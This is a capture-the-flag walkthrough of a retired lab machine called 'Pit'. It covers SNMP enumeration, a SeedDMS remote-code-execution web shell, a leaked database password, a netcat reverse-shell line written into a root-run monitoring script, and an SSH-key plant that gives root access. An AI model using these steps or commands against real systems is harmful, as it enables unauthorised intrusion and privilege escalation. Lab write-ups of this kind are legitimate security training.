Pit is a vulnerable machine with linux operating system among retired machines and it is expected to obtain user and root flags using these vulnerabilities.
We perform a network scan with nmap to recognize the target machine.
Classic Scan
Full Port Scan
As a result of port scanning, 22/tcp ssh OpenSSH, 80/tcp http nginx 1.14, 9090/tcp ssl/zeus-admin, 161/udp snmp ports are open.
Here we encountered dms-pit.htb and we save it to the host file.
We provide snmp enumueratio
nmap -A -sU -p161 10.10.10.241 -Pn
snmpwalk -v2c -c public 10.10.10.241 .
/var/www/html/seeddms51x/seeddms
/usr/bin/monitor
Their files are remarkable
Let’s try to go to it when there is a file in the html.
Here it redirected us to the login page
We tried the default passwords to log in here, but we could not see the user michelle, so we tried the same username and password here and we were able to log in.
Here we provide enumueration
Let’s see if there is a vulnerability in Searchploit
We have seen that there is an RCE vulnerability here. Let’s save the code given here as Shell.php and try to install it
Here we see the document id as 29, which is written in the fourth step of the vulnerability.
example.com/data/1048576/”document_id”/1.php?cmd=cat+/etc/passwd
let’s log in as
In this way, we read the passwd file and then tried various ways to give us Shell, but we could not get any Shell, so we provide enumeration via this url.
../../../../conf/settings.xml directory we see the settinggs xml file
Here we access credential information.
dbDriver=”mysql” dbHostname=”localhost” dbDatabase=”seeddms” dbUser=”seeddms” dbPass=”ied^ieY6xoquu” doNotCheckVersion=”false”>
here was the login screen on port 9090, let’s log in by trying this username and password
We tried to log in with seeddms username without success on user michelle
we were able to make a surprise entry
We saw the terminal server in the bottom left option.
Here we were able to get the user flag but not the root directory, so we continue with the local enumeration.
We did not get any information from linpeas.sh, let’s look at the monitor file from smpwalk /usr/bin/monitor
When we went and looked, we couldn’t see anything.
We saw it using ls -ld because only root is authorized.
With Getfacl we displayed the owner, group and Access Control List (ACL).
Let’s see if we can write something in it or not;
We can write in it
Here instead of check.sh we make it give us a reverseshell.
echo “nc 10.10.14.157 4444 -e /bin/bash” > /usr/local/monitoring/check.sh
Then we listen with nc and smtp check to work
snmpwalk -m +MY-MIB -v2c -c public 10.10.10.10.241 nsExtendObjects
we got the command sell on root yetsinde to the user
does not give any output here
Here we encounter the problem, this problem does not give us output from the command we wrote, we tried to get revereshell, it did not give it again, let’s add the .pub plugin to the root .ssh folder here, the file we created with sshkeygen
Let’s take this key and add it to the root termianl
Then let’s use this ssh key and get shel
We finally got our root flag
A difficult and challenging machine 🙂